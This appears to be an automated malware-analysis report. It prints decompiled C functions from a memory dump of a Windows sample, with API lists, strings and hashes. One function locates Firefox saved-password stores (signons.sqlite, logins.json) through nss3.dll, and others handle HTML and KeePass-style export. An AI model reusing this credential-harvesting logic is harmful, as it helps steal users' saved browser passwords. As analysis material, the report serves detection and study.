                                                                                                                                                                  0x0040b0b6
                                                                                                                                                                  0x0040b0bd
                                                                                                                                                                  0x0040b0c4
                                                                                                                                                                  0x0040b0d5
                                                                                                                                                                  0x0040b0da
                                                                                                                                                                  0x0040b0e8
                                                                                                                                                                  0x0040b0f9
                                                                                                                                                                  0x0040b101
                                                                                                                                                                  0x0040b112
                                                                                                                                                                  0x0040b11a
                                                                                                                                                                  0x0040b12b
                                                                                                                                                                  0x0040b12e
                                                                                                                                                                  0x0040b144
                                                                                                                                                                  0x0040b147
                                                                                                                                                                  0x0040b151
                                                                                                                                                                  0x0040b154
                                                                                                                                                                  0x0040b155
                                                                                                                                                                  0x0040b157
                                                                                                                                                                  0x0040b15f
                                                                                                                                                                  0x0040b161
                                                                                                                                                                  0x0040b169
                                                                                                                                                                  0x0040b16b
                                                                                                                                                                  0x0040b16b
                                                                                                                                                                  0x0040b15f
                                                                                                                                                                  0x0040b179
                                                                                                                                                                  0x0040b184
                                                                                                                                                                  0x0040b184
                                                                                                                                                                  0x0040b18a
                                                                                                                                                                  0x0040b190
                                                                                                                                                                  0x0040b192
                                                                                                                                                                  0x0040b192
                                                                                                                                                                  0x0040b19d
                                                                                                                                                                  0x0040b1ac

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040B056
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040B067
                                                                                                                                                                  • strrchr.MSVCRT ref: 0040B076
                                                                                                                                                                  • strcat.MSVCRT(00000000,.cfg), ref: 0040B090
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040B0C4
                                                                                                                                                                  • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040B0D5
                                                                                                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0040B16B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                                                                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$\LA
                                                                                                                                                                  • API String ID: 1301239246-3877392175
                                                                                                                                                                  • Opcode ID: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                  • Instruction ID: 0af9f59d4ba14ec1661be341c61033e05a04fd550f4be300a3a65ce9efdf479e
                                                                                                                                                                  • Opcode Fuzzy Hash: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                  • Instruction Fuzzy Hash: F2414A72940118AFCB21DB54CC88FDABBBCAB58700F0441E6F509E7191DB749BC8CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004095F5, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E004095F5(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F6E2(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405F07(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F6E2(_v28,  &_v184);
						E0040F70E( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F6E2(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F797( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405F07(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405F07(_a4, "</table><p>");
				return E00405F07(_a4, 0x413b1c);
			}































                                                                                                                                                                  0x004095f5
                                                                                                                                                                  0x0040960e
                                                                                                                                                                  0x00409615
                                                                                                                                                                  0x0040961c
                                                                                                                                                                  0x00409628
                                                                                                                                                                  0x0040962a
                                                                                                                                                                  0x0040962d
                                                                                                                                                                  0x00409634
                                                                                                                                                                  0x00409638
                                                                                                                                                                  0x00409647
                                                                                                                                                                  0x0040964e
                                                                                                                                                                  0x0040965a
                                                                                                                                                                  0x0040965e
                                                                                                                                                                  0x00409665
                                                                                                                                                                  0x0040966a
                                                                                                                                                                  0x00409676
                                                                                                                                                                  0x00409679
                                                                                                                                                                  0x00409692
                                                                                                                                                                  0x00409697
                                                                                                                                                                  0x00409697
                                                                                                                                                                  0x004096a2
                                                                                                                                                                  0x004096ac
                                                                                                                                                                  0x004096af
                                                                                                                                                                  0x004096b9
                                                                                                                                                                  0x004096bf
                                                                                                                                                                  0x004096ce
                                                                                                                                                                  0x004096d9
                                                                                                                                                                  0x004096df
                                                                                                                                                                  0x004096e2
                                                                                                                                                                  0x004096e6
                                                                                                                                                                  0x004096ea
                                                                                                                                                                  0x004096f2
                                                                                                                                                                  0x004096f5
                                                                                                                                                                  0x00409700
                                                                                                                                                                  0x0040970d
                                                                                                                                                                  0x00409721
                                                                                                                                                                  0x0040972f
                                                                                                                                                                  0x00409736
                                                                                                                                                                  0x00409739
                                                                                                                                                                  0x0040973f
                                                                                                                                                                  0x00409774
                                                                                                                                                                  0x00409741
                                                                                                                                                                  0x00409744
                                                                                                                                                                  0x00409757
                                                                                                                                                                  0x00409760
                                                                                                                                                                  0x00409765
                                                                                                                                                                  0x00409765
                                                                                                                                                                  0x0040977b
                                                                                                                                                                  0x0040977e
                                                                                                                                                                  0x00409782
                                                                                                                                                                  0x0040978f
                                                                                                                                                                  0x00409795
                                                                                                                                                                  0x0040979f
                                                                                                                                                                  0x004097c3
                                                                                                                                                                  0x004097ce
                                                                                                                                                                  0x004097d3
                                                                                                                                                                  0x004097d6
                                                                                                                                                                  0x004097df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004096b7
                                                                                                                                                                  0x004096b7
                                                                                                                                                                  0x004096b9
                                                                                                                                                                  0x004097e5
                                                                                                                                                                  0x004097ed
                                                                                                                                                                  0x00409805

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00409615
                                                                                                                                                                  • memset.MSVCRT ref: 00409638
                                                                                                                                                                  • memset.MSVCRT ref: 0040964E
                                                                                                                                                                  • memset.MSVCRT ref: 0040965E
                                                                                                                                                                  • sprintf.MSVCRT ref: 00409692
                                                                                                                                                                  • strcpy.MSVCRT(00000000, nowrap), ref: 004096D9
                                                                                                                                                                  • sprintf.MSVCRT ref: 00409760
                                                                                                                                                                  • strcat.MSVCRT(?,&nbsp;), ref: 0040978F
                                                                                                                                                                    • Part of subcall function 0040F6E2: sprintf.MSVCRT ref: 0040F701
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00409774
                                                                                                                                                                  • sprintf.MSVCRT ref: 004097C3
                                                                                                                                                                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                  • API String ID: 2822972341-601624466
                                                                                                                                                                  • Opcode ID: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                                                                                                                                                                  • Instruction ID: ad5d45e3310275bf8c81aed9ad428c342ee671dbf73ea1c77541a84cad310e98
                                                                                                                                                                  • Opcode Fuzzy Hash: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                                                                                                                                                                  • Instruction Fuzzy Hash: AA615032900214AFDF18DF94CC85EDE7B79EF08314F1001AAFA05A71D2DB79AA95CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A02E, Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E0040A02E(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x417b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x417b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049F1( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}
















                                                                                                                                                                  0x0040a031
                                                                                                                                                                  0x0040a03f
                                                                                                                                                                  0x0040a049
                                                                                                                                                                  0x0040a04f
                                                                                                                                                                  0x0040a05b
                                                                                                                                                                  0x0040a060
                                                                                                                                                                  0x0040a066
                                                                                                                                                                  0x0040a07b
                                                                                                                                                                  0x0040a07b
                                                                                                                                                                  0x0040a084
                                                                                                                                                                  0x0040a090
                                                                                                                                                                  0x0040a095
                                                                                                                                                                  0x0040a09b
                                                                                                                                                                  0x0040a0b0
                                                                                                                                                                  0x0040a0b0
                                                                                                                                                                  0x0040a0bc
                                                                                                                                                                  0x0040a0c1
                                                                                                                                                                  0x0040a0c7
                                                                                                                                                                  0x0040a0fd
                                                                                                                                                                  0x0040a101
                                                                                                                                                                  0x0040a10b
                                                                                                                                                                  0x0040a10d
                                                                                                                                                                  0x0040a111
                                                                                                                                                                  0x0040a122
                                                                                                                                                                  0x0040a12c
                                                                                                                                                                  0x0040a139
                                                                                                                                                                  0x0040a145
                                                                                                                                                                  0x0040a148
                                                                                                                                                                  0x0040a16e

                                                                                                                                                                  APIs
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A05B
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A066
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A07B
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040A090
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A09B
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A0B0
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A0BC
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 0040A0C7
                                                                                                                                                                  • LoadImageA.USER32 ref: 0040A0E5
                                                                                                                                                                  • LoadImageA.USER32 ref: 0040A101
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040A10D
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040A111
                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 0040A12C
                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 0040A139
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040A145
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0040A148
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A166
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3411798969-0
                                                                                                                                                                  • Opcode ID: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                                                                                                                                                                  • Instruction ID: 418605dbbba7a2bdca51e359c3d30d4779c94778b6a4b101a6c03afd9e8c1dd7
                                                                                                                                                                  • Opcode Fuzzy Hash: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                                                                                                                                                                  • Instruction Fuzzy Hash: F13121716803087EFA316B709C47FD6BB95EB48B05F104829F3956A1E1CAF279909B18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D7C1, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040D7C1(intOrPtr* __eax, void* __edx, void* __eflags, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t45;
				int _t54;
				int _t60;
				char* _t63;
				void* _t65;
				void* _t67;
				void* _t72;
				char* _t73;
				void* _t82;
				int _t91;
				char* _t97;
				void* _t100;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t120;
				intOrPtr* _t121;
				void* _t125;
				char** _t126;
				char** _t127;

				_t120 = __edx;
				_t121 = __eax;
				_t45 = E00406C5E(__eax + 0x1c, __eax, __eflags, _a4);
				_t130 = _t45;
				if(_t45 == 0) {
					__eflags = 0;
					return 0;
				}
				E00404638(_t121 + 0x468);
				E00406209(_t121 + 0x158, _a4);
				_t97 = _t121 + 0x25d;
				 *_t97 = 0;
				E0040C70B(_t130, _t121 + 0x18);
				if( *_t97 == 0) {
					_t91 = strlen(_t121 + 0x158);
					 *_t126 = "signons.txt";
					_t10 = strlen(??) + 1; // 0x1
					if(_t91 + _t10 >= 0x104) {
						 *((char*)(_t121 + 0x25d)) = 0;
					} else {
						E004062B7(_t121 + 0x25d, _t121 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t127 =  &(_t126[3]);
				_t54 = strlen(_t121 + 0x158);
				 *_t127 = "signons.sqlite";
				_t18 = strlen(??) + 1; // 0x1
				if(_t54 + _t18 >= 0x104) {
					_v268 = 0;
				} else {
					E004062B7( &_v268, _t121 + 0x158, "signons.sqlite");
				}
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_t60 = strlen(_t121 + 0x158);
				_t127[3] = "logins.json";
				_t26 = strlen(??) + 1; // 0x1
				_pop(_t104);
				if(_t60 + _t26 >= 0x104) {
					_v532 = 0;
				} else {
					E004062B7( &_v532, _t121 + 0x158, "logins.json");
					_pop(_t104);
				}
				_t63 = _t121 + 0x25d;
				_t135 =  *_t63;
				if( *_t63 != 0) {
					_t82 = E00406C5E(_t121 + 4, _t121, _t135, _t63);
					_t136 = _t82;
					if(_t82 != 0) {
						E0040C656(_t104, _t121, _t136);
					}
				}
				_t65 = E00406155( &_v268);
				_t137 = _t65;
				_pop(_t105);
				if(_t65 != 0) {
					E0040D3B5(_t105, _t137, _t121,  &_v268);
				}
				_t67 = E00406155( &_v532);
				_t138 = _t67;
				_pop(_t106);
				if(_t67 != 0) {
					E0040D003(_t106, _t120, _t138, _t121,  &_v532);
				}
				_t100 = 0;
				if( *((intOrPtr*)(_t121 + 0x474)) <= 0) {
					L24:
					return 1;
				} else {
					do {
						_t125 = E0040DA96(_t100, _t121 + 0x468);
						_t38 = _t125 + 0x504; // 0x504
						_t72 = _t38;
						_push("none");
						_push(_t72);
						L00412072();
						if(_t72 != 0) {
							_t39 = _t125 + 4; // 0x4
							_t73 = _t39;
							if( *_t73 == 0) {
								_t40 = _t125 + 0x204; // 0x204
								strcpy(_t73, _t40);
							}
							 *((intOrPtr*)( *_t121 + 4))(_t125);
						}
						_t100 = _t100 + 1;
					} while (_t100 <  *((intOrPtr*)(_t121 + 0x474)));
					goto L24;
				}
			}





























                                                                                                                                                                  0x0040d7c1
                                                                                                                                                                  0x0040d7d0
                                                                                                                                                                  0x0040d7d5
                                                                                                                                                                  0x0040d7da
                                                                                                                                                                  0x0040d7dc
                                                                                                                                                                  0x0040d9cf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d9cf
                                                                                                                                                                  0x0040d7e8
                                                                                                                                                                  0x0040d7f6
                                                                                                                                                                  0x0040d7ff
                                                                                                                                                                  0x0040d806
                                                                                                                                                                  0x0040d809
                                                                                                                                                                  0x0040d816
                                                                                                                                                                  0x0040d81f
                                                                                                                                                                  0x0040d826
                                                                                                                                                                  0x0040d832
                                                                                                                                                                  0x0040d839
                                                                                                                                                                  0x0040d856
                                                                                                                                                                  0x0040d83b
                                                                                                                                                                  0x0040d84d
                                                                                                                                                                  0x0040d853
                                                                                                                                                                  0x0040d839
                                                                                                                                                                  0x0040d867
                                                                                                                                                                  0x0040d86e
                                                                                                                                                                  0x0040d879
                                                                                                                                                                  0x0040d87d
                                                                                                                                                                  0x0040d884
                                                                                                                                                                  0x0040d890
                                                                                                                                                                  0x0040d897
                                                                                                                                                                  0x0040d8b4
                                                                                                                                                                  0x0040d899
                                                                                                                                                                  0x0040d8ab
                                                                                                                                                                  0x0040d8b1
                                                                                                                                                                  0x0040d8c5
                                                                                                                                                                  0x0040d8cc
                                                                                                                                                                  0x0040d8db
                                                                                                                                                                  0x0040d8e2
                                                                                                                                                                  0x0040d8ee
                                                                                                                                                                  0x0040d8f4
                                                                                                                                                                  0x0040d8f5
                                                                                                                                                                  0x0040d912
                                                                                                                                                                  0x0040d8f7
                                                                                                                                                                  0x0040d909
                                                                                                                                                                  0x0040d90f
                                                                                                                                                                  0x0040d90f
                                                                                                                                                                  0x0040d919
                                                                                                                                                                  0x0040d91f
                                                                                                                                                                  0x0040d922
                                                                                                                                                                  0x0040d928
                                                                                                                                                                  0x0040d92d
                                                                                                                                                                  0x0040d92f
                                                                                                                                                                  0x0040d931
                                                                                                                                                                  0x0040d931
                                                                                                                                                                  0x0040d92f
                                                                                                                                                                  0x0040d93d
                                                                                                                                                                  0x0040d942
                                                                                                                                                                  0x0040d944
                                                                                                                                                                  0x0040d945
                                                                                                                                                                  0x0040d94f
                                                                                                                                                                  0x0040d94f
                                                                                                                                                                  0x0040d95b
                                                                                                                                                                  0x0040d960
                                                                                                                                                                  0x0040d962
                                                                                                                                                                  0x0040d963
                                                                                                                                                                  0x0040d96d
                                                                                                                                                                  0x0040d96d
                                                                                                                                                                  0x0040d972
                                                                                                                                                                  0x0040d97a
                                                                                                                                                                  0x0040d9ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d97c
                                                                                                                                                                  0x0040d97c
                                                                                                                                                                  0x0040d989
                                                                                                                                                                  0x0040d98b
                                                                                                                                                                  0x0040d98b
                                                                                                                                                                  0x0040d991
                                                                                                                                                                  0x0040d996
                                                                                                                                                                  0x0040d997
                                                                                                                                                                  0x0040d9a0
                                                                                                                                                                  0x0040d9a2
                                                                                                                                                                  0x0040d9a2
                                                                                                                                                                  0x0040d9a8
                                                                                                                                                                  0x0040d9aa
                                                                                                                                                                  0x0040d9b2
                                                                                                                                                                  0x0040d9b8
                                                                                                                                                                  0x0040d9be
                                                                                                                                                                  0x0040d9be
                                                                                                                                                                  0x0040d9c1
                                                                                                                                                                  0x0040d9c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d97c

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00406C5E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D7DA,?,?,?,?), ref: 00406C77
                                                                                                                                                                    • Part of subcall function 00406C5E: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406CA3
                                                                                                                                                                    • Part of subcall function 00404638: free.MSVCRT(00000000,0040BE16), ref: 0040463F
                                                                                                                                                                    • Part of subcall function 00406209: strcpy.MSVCRT(?,?,0040D7FB,?,?,?,?,?), ref: 0040620E
                                                                                                                                                                    • Part of subcall function 00406209: strrchr.MSVCRT ref: 00406216
                                                                                                                                                                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C72C
                                                                                                                                                                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C740
                                                                                                                                                                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C754
                                                                                                                                                                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C821
                                                                                                                                                                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C881
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D81F
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D82D
                                                                                                                                                                  • memset.MSVCRT ref: 0040D86E
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D87D
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D88B
                                                                                                                                                                  • memset.MSVCRT ref: 0040D8CC
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D8DB
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D8E9
                                                                                                                                                                  • _stricmp.MSVCRT(00000504,none,?,?,?,?,?,?), ref: 0040D997
                                                                                                                                                                  • strcpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040D9B2
                                                                                                                                                                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen$memset$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                                                                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                  • API String ID: 1405107918-3138536805
                                                                                                                                                                  • Opcode ID: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                  • Instruction ID: d07004e2ff50c5cd41ef2cdd6425adcf976a56e41a8fa9a3887142b7f0986be6
                                                                                                                                                                  • Opcode Fuzzy Hash: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                  • Instruction Fuzzy Hash: B051E3B2904145AED714EBE0CC85BDAB7ACAF41305F10057BE159E21C2EB78AAD98B5C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BA21, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E0040BA21(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L00412072();
				if(__eax != 0) {
					_push("/sverhtml");
					L00412072();
					if(__eax != 0) {
						_push("/sxml");
						L00412072();
						if(__eax != 0) {
							_push("/stab");
							L00412072();
							if(__eax != 0) {
								_push("/scomma");
								L00412072();
								if(__eax != 0) {
									_push("/stabular");
									L00412072();
									if(__eax != 0) {
										_push("/skeepass");
										L0041207E();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}









                                                                                                                                                                  0x0040ba22
                                                                                                                                                                  0x0040ba27
                                                                                                                                                                  0x0040ba30
                                                                                                                                                                  0x0040ba37
                                                                                                                                                                  0x0040ba3c
                                                                                                                                                                  0x0040ba45
                                                                                                                                                                  0x0040ba4c
                                                                                                                                                                  0x0040ba51
                                                                                                                                                                  0x0040ba5a
                                                                                                                                                                  0x0040ba61
                                                                                                                                                                  0x0040ba66
                                                                                                                                                                  0x0040ba6f
                                                                                                                                                                  0x0040ba76
                                                                                                                                                                  0x0040ba7b
                                                                                                                                                                  0x0040ba84
                                                                                                                                                                  0x0040ba8b
                                                                                                                                                                  0x0040ba90
                                                                                                                                                                  0x0040ba99
                                                                                                                                                                  0x0040baa0
                                                                                                                                                                  0x0040baa5
                                                                                                                                                                  0x0040baac
                                                                                                                                                                  0x0040bab6
                                                                                                                                                                  0x0040ba9b
                                                                                                                                                                  0x0040ba9d
                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                  0x0040ba86
                                                                                                                                                                  0x0040ba88
                                                                                                                                                                  0x0040ba89
                                                                                                                                                                  0x0040ba89
                                                                                                                                                                  0x0040ba71
                                                                                                                                                                  0x0040ba73
                                                                                                                                                                  0x0040ba74
                                                                                                                                                                  0x0040ba74
                                                                                                                                                                  0x0040ba5c
                                                                                                                                                                  0x0040ba5e
